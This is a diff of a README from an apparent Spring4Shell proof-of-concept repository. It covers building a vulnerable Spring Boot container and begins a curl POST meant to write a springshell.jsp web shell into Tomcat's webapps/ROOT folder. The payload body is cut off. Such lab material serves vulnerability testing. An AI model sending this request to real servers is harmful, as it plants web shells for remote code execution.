anair-it/springshell-vuln-POC/springshell-boot-zeroday/README.md

     - Build a JDK 11 image (This POC uses Amazon Corretto, but pick your applicable image)
     - Create a container from the image
       `mvn clean package && docker build . -t springshell && docker run --name springshell --rm -p 8080:8080 springshell`
-2. Run curl command that attempts to create a jsp file in the tomcat webapps/ROOT folder.
-The jsp name is springshell.jsp
+2. Run below POST request that attempts to create a jsp file in the tomcat webapps/ROOT folder.
+The jsp file is springshell.jsp
 ```
 curl --request POST \
   --url http://localhost:8080/zeroday \